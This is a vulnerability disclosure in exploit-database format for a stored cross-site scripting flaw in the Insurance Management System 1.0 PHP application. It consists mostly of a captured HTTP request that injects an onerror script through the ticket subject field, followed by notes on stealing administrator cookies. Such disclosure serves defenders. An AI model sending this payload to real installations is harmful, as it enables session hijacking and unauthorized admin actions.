# Exploit Title: Wise-Insurance Agency - Insurance Management System 1.0 - Stored XSS
# Date: 25.08.2025
# Exploit Author: Emir Bulutlu
# Vendor: https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html
# Demo Site: http://localhost/E-Insurance/Script/user/?page=generate
# Version: 1.0
# Tested on: macOS
# CVE: N/A

## Within the Insurance Management System, any user can register and subsequently create support tickets. It was observed that the “Subject” field of a support ticket fails to properly sanitize user-supplied input, allowing the injection of malicious JavaScript payloads. This results in a Stored Cross-Site Scripting (XSS) vulnerability.

POST /E-Insurance/Script/user/core/new_ticket HTTP/1.1
Host: localhost
Content-Length: 116
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="139", "Not;A=Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Accept-Language: en-US,en;q=0.9
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/E-Insurance/Script/user/?page=generate
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=qummosnu73pka73ta09dh44bos; __insuarance__logged=1; __insuarance__key=3W08ZLPXIAYGZ840K6BX
Connection: keep-alive

category=4&subject=Test%22%2F%3E%3Cimg+src%3Dx+onerror%3Dconfirm%28document.cookie%29%3E&description=Testv2&submit=1

## Support tickets are displayed on the administrator’s dashboard under “Support Tickets.” When an administrator views a malicious ticket, the injected script is executed in their browser context. 

## Exploitation of this issue could allow an attacker to: Steal administrator session cookies, exfiltrate sensitive information accessible within the admin dashboard, perform unauthorized actions on behalf of the administrator.